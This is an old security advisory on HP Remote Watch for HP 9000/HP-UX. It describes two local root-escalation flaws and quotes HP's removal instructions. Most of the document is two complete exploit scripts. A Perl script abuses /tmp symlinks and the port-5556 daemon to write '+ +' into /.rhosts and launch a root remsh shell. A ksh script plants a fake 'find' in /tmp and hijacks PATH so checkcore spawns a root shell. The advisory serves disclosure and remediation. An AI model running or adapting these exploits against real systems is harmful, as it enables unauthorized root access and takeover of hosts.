COMMAND

    /usr/remwatch/* (Remote Watch)

SYSTEMS AFFECTED

    HP 9000 series 300/400/700/800s

PROBLEM

    The  Remote  Watch  package  is  a  system  management  tool whose
    capabilities  have  been  largely   incorporated  in  the   System
    Administration Manager  (SAM).   Two vulnerabilities  in HP Remote
    Watch exists allowing  users to gain  root access.   The first was
    via a socket connection on port 5556.  The second was as a  result
    of using the showdisk utility,  which is part of the  Remote Watch
    product.  See this two exploit below.

------------------------------------------------------------------------------
#!/usr/bin/perl

# displays a problem with RemoteWatch use of /tmp to store filestuffs
# SOD - June 96

use Socket;
use FileHandle;

$SIG{'INT'} = 'dokill';
sub dokill { kill 9,$child if $child; }

STDOUT->autoflush();

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

if (-f "/.rhosts") {
  print "/.rhosts exists!  Cannot spooge...\n";
  print "(but I can be used to make ANY root owned world writable file...)\n";
  exit;
  }


print "This program will attempt to put + + into /.rhosts\n";
system("rm -rf /tmp/iconTmpUpdate");
chop($host=`hostname`);
mkdir("/tmp/iconTmpUpdate",0777);
mkdir("/tmp/iconTmpUpdate/$host",0777);
chmod(0777,"/tmp/iconTmpUpdate","/tmp/iconTmpUpdate/$host");
symlink("/.rhosts","/tmp/iconTmpUpdate/$host/done")||die "$!: cannot symlink";

$port=5556;
shift(@ARGV);
($name, $aliases, $proto) = getprotobyname('tcp');
($name, $aliases, $type, $len, $thataddr) = gethostbyname($host);
$that=pack('S n a4 x8', AF_INET, $port, $thataddr);

socket(S,PF_INET,SOCK_STREAM,$proto)|| die "socket: $!";
connect(S,$that) || die "connect: $!";
S->autoflush();

# 20 20 31 7a gives back a 0x6f(111) -- meaning WHAT exactly?
#print S h2cs("2020317a");

# 20 20 31 5a gives back 0 0 5 0xa(10) -- gah?
print S h2cs("202031");
print S chr(117);
print "Please wait";
while($c=getc(S)) {
  print ".";
  }
close(S);

$n=0;
while($n++<6) {
  print "\nOK...";
  last if (-f "/.rhosts");
  sleep 1;
  }
print "\n";
open(R,">>/.rhosts");
print R "+ +\n";
close(R);
print "Testing out your root shell...\n";
system("remsh $host -l root sh -i");
exit;

STDOUT->autoflush();

if ($child = fork) {
  while (<>) { print S; }
  sleep 3;
  do dokill();
  } else {
  while (<S>) { print; }
  }
close(S);
exit;
------------------------------------------------------------------------------

    or you can try this one,

------------------------------------------------------------------------------
#!/bin/ksh

# SOD (as of 06/11/96)
# same sorta bug, different file.

if [ ! -x /usr/remwatch/bin/fmon/checkcore ]
then
  echo This is an exploit for the checkcore utility internal to
  echo HP\'s Remote Watch series of programs.
  echo The checkcore utility doesn\'t appear to be on your system.
  echo Moo
  exit
fi

PGM=$*

if [ -z "${PGM}" ]
then
  PROGGIE=`basename $0`
  echo "${PROGGIE}: I will run a shell for you"
  PGM="/bin/ksh -i"
fi

TTY=`tty`

echo '#!/bin/ksh' > /tmp/find
echo "${PGM} >> ${TTY} 2>&1" >> /tmp/find
chmod 777 /tmp/find
PATH=/tmp:$PATH
export PATH
/usr/remwatch/bin/fmon/checkcore > /dev/null 2>&1
rm /tmp/find
------------------------------------------------------------------------------

SOLUTION

    Do not  use Remote  Watch.   These files  can not  be patched  but
    should  be  removed  as  recommended  by  in  HP Security Advisory
    #9610-039.

    This vulnerability  can only  be eliminated  from releases  9.X of
    HP-UX  which  are  using  Remote  Watch  by  disabling  the entire
    product.  The default location for this product is /usr/remwatch/.
    Removal can be accomplished (as root) with the following:

    NOTE: Do not  run the standard  rmfn command as  HP has discovered
    problems  with  its  inability  to  handle  programs  with  active
    executables.

    Instead, run (with no options):

	/usr/remwatch/bin/removeall

    This  runs  a  Remote  Watch  script  called "unconfigure" to stop
    actively  running  programs,  then  proceeds  to  remove all files
    including the filesets.

    The administrator should also perform both of the following steps:

    1.  Remove or comment  out the following entry in  /etc/inetd.conf
	file:

    rwdaemon stream tcp nowait root /usr/remwatch/bin/rwdaemon rwdaemon

    2.  Have inetd re-read its configuration file by executing at  the
	prompt:

	inetd -c

    This is the official recommendation from Hewlett-Packard Company.